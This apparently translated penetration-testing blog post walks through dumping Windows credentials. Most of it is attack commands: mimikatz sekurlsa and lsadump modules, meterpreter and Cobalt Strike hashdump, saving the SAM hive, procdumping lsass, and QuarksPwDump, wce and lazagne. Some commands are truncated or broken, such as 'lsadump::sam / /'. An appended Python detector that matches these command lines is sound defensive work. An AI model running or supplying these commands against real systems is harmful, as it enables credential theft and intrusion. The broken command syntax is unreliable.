Online password capture



mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

Script

Use Get-PassHashes.ps1

powershell -exec bypass
Import-Module .\Get-PassHashes.PS1


The process of obtaining a meterpreter session is omitted here; the connection is established over SMB port 445.

run hashdump
post/windows/gather/credentials/domain_hashdump (gets domain hashes)
use mimikatz
wdigest (plaintext)

4. CS (Cobalt Strike) session

The session on the host needs at least administrator privileges; with user-level privileges, privileges must be elevated before credentials can be captured.

logonpasswords (plaintext)

Here I use PowerShell to bring the host online; I won't go into details about that process.

hashdump command

wdigest command

logonpasswords command

Offline password capture

(1) SAM (shadow copy, registry)

Shadow copy: a shadow copy, also known as a snapshot, is a point-in-time copy of a replica stored on the Data Protection Manager (DPM) server. A replica is a full point-in-time copy of the protected shares, folders and files of a single volume on a file server.

With administrator privileges, run the following commands:

reg save hklm\sam
reg save hklm\system

Then run the following command in mimikatz:

lsadump::sam / /

(2) lsass.exe (inject into the lsass.exe process and extract ... from its memory)

Run the following command:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Open cmd in the directory that contains mimikatz and the dmp file, and run the following command:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

Note: both of these steps require administrator privileges; otherwise the following error is reported.

(3) Manually exporting the lsass.dmp file

Use Task Manager to export the lsass.dmp file.

The remaining steps are the same as above.

Other tools


The command is as follows:

QuarksPwDump.exe -dhl -o hash.txt


Grab the plaintext

wce.exe -w

Grab hashes

wce.exe -l


The command is as follows:

lazagne.exe windows
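
Seen from the defender's side, the commands listed in this article leave recognisable process-creation command lines. The following Python detector is an added example, not part of the original article; the rule names, severity levels, host names and sample events are constructed assumptions.

```python
import re

# Detection rules built from the command lines shown on this page.
# Rule names and severity levels are assumptions made for this example.
RULES = [
    ("registry_hive_save", "high",
     re.compile(r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|system)\b", re.I)),
    ("lsass_memory_dump", "high",
     re.compile(r"\s-ma\s+lsass(\.exe)?\b", re.I)),
    ("mimikatz_module", "high",
     re.compile(r"\b(sekurlsa|lsadump)::|\bprivilege::debug\b", re.I)),
    ("credential_tool", "medium",
     re.compile(r"\b(quarkspwdump|lazagne)(\.exe)?\b|\bwce(\.exe)?\s+-[wl]\b|get-passhashes", re.I)),
    ("ps_policy_bypass", "low",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-e(xec|p)\S*\s+bypass\b", re.I)),
]
RANK = {"low": 1, "medium": 2, "high": 3}

def scan(events):
    """Return one (host, rule, severity) hit per rule matched by each event."""
    hits = []
    for ev in events:
        for name, severity, pattern in RULES:
            if pattern.search(ev["command_line"]):
                hits.append((ev["host"], name, severity))
    return hits

def worst_by_host(hits):
    """Collapse hits to the highest severity seen on each host."""
    worst = {}
    for host, _rule, severity in hits:
        if RANK[severity] > RANK.get(worst.get(host), 0):
            worst[host] = severity
    return worst

# Constructed process-creation events (host names and file names are made up).
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": r"reg save hklm\sam C:\Temp\s.hiv"},
    {"host": "WS01", "command_line": r"procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"host": "WS02", "command_line": r"powershell -exec bypass"},
    {"host": "WS02", "command_line": r"wce.exe -w"},
    {"host": "WS03", "command_line": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"'},
    {"host": "WS04", "command_line": r"reg query hklm\software\microsoft"},   # benign
    {"host": "WS04", "command_line": r"procdump.exe -ma notepad.exe n.dmp"},  # benign
]

if __name__ == "__main__":
    print(worst_by_host(scan(SAMPLE_EVENTS)))
```

Rules that match on arguments such as `-ma lsass.exe` or `sekurlsa::` still fire when the binary is renamed; the tool-name rule does not.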


Thanks for the ideas that made this article possible; I would like to express my heartfelt thanks to master Yicun Yiye.

There are many more advanced methods of capturing hashes, but because of my technical level, even if I practised them I would not understand the principles, so I'm not going to research them in depth for the moment. I'm posting a link for interested masters, who can continue to dig deeper; I'll wait until I have enough knowledge.
